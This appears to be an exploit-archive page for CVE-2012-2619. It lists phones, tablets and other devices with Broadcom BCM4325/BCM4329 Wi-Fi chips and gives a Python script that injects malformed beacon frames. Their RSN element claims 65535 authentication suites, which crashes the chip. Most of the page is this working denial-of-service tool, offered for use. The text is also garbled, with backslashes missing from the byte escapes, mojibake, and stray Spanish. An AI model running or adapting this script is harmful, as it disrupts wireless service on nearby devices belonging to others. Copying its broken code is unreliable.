[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Broadcom DoS on BCM4325 and BCM4329 Devices
# Published : 2012-11-15
# Author :
# Previous Title : Internet Explorer 9 Memory Corruption Crash PoC
# Next Title : Adobe Reader 11.0.0 Stack Overflow Crash PoC


# Exploit Author:
CoreLabs (Core Security Technologies) fue descubierta por el 
investigador argentino Andr®¶s Blanco,
# Vendor Homepage: 
# Software Link: [download link if available]
# Version: 1.0
# Tested on: 
Apple iPhone 3GS 
Apple iPod 2G 
HTC Touch Pro 2 
HTC Droid Incredible 
Samsung Spica 
Acer Liquid 
Motorola Devour 
Veh®™culo Ford Edge 
Dispositivos afectados con el chipset BCM4329: 
Apple iPhone 4 
Apple iPhone 4 Verizon 
Apple iPod 3G 
Apple iPad Wi-Fi 
Apple iPad 3G 
Apple iPad 2 
Apple Tv 2G 
Motorola Xoom 
Motorola Droid X2 
Motorola Atrix 
Samsung Galaxy Tab 
Samsung Galaxy S 4G 
Samsung Nexus S 
Samsung Stratosphere 
Samsung Fascinate 
HTC Nexus One 
HTC Evo 4G 
HTC ThunderBolt 
HTC Droid Incredible 2 
LG Revolution 
Sony Ericsson Xperia Play 
Pantech Breakout 
Nokia Lumina 800 
Kyocera Echo 
Asus Transformer Prime 
Malata ZPad"

# CVE : 2012-2619
#!/usr/bin/env python 

import sys 
import time 
import struct 
import PyLorcon2 

def beaconFrameGenerator(): 
    sequence = 0 
    while(1): 
        sequence = sequence % 4096 

        # Frame Control 
        frame = 'x80' # Version: 0 - Type: Managment - Subtype: Beacon 
        frame += 'x00' # Flags: 0 
        frame += 'x00x00' # Duration: 0 
        frame += 'xffxffxffxffxffxff' # Destination: ff:ff:ff:ff:ff:ff 
        frame += 'x00x00x00x15xdexad' # Source: 00:00:00:15:de:ad 
        frame += 'x00x00x00x15xdexad' # BSSID: 00:00:00:15:de:ad 
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: 
#part of the generator 
        # Frame Body 
        frame += struct.pack('Q', time.time()) # Timestamp 
        frame += 'x64x00' # Beacon Interval: 0.102400 seconds 
        frame += 'x11x04' # Capability Information: ESS, Privacy, 
#Short Slot time 
        # Information Elements 
        # SSID: buggy 
        frame += 'x00x05buggy' 
        # Supported Rates: 1,2,5.5,11,18,24,36,54 
        frame += 'x01x08x82x84x8bx96x24x30x48x6c' 
        # DS Parameter Set: 6 
        frame += 'x03x01x06' 
        # RSN IE 
        frame += 'x30' # ID: 48 
        frame += 'x14' # Size: 20 
        frame += 'x01x00' # Version: 1 
        frame += 'x00x0fxacx04' # Group cipher suite: TKIP 
        frame += 'x01x00' # Pairwise cipher suite count: 1 
        frame += 'x00x0fxacx00' # Pairwise cipher suite 1: TKIP 
        frame += 'xffxff' # Authentication suites count: 65535 
        frame += 'x00x0fxacx02' # Pairwise authentication suite 2: PSK 
        frame += 'x00x00' 

        sequence += 1 
        yield frame 

if __name__ == "__main__": 
    if len(sys.argv) != 2: 
        print "Usage:" 
        print "t%s <wireless interface>" % sys.argv[0] 
        sys.exit(-1) 

    iface = sys.argv[1] 
    context = PyLorcon2.Context(iface) 
    context.open_injmon() 

    generator = beaconFrameGenerator() 

    for i in range(10000): 
        frame = generator.next() 
        time.sleep(0.100) 
        context.send_bytes(frame)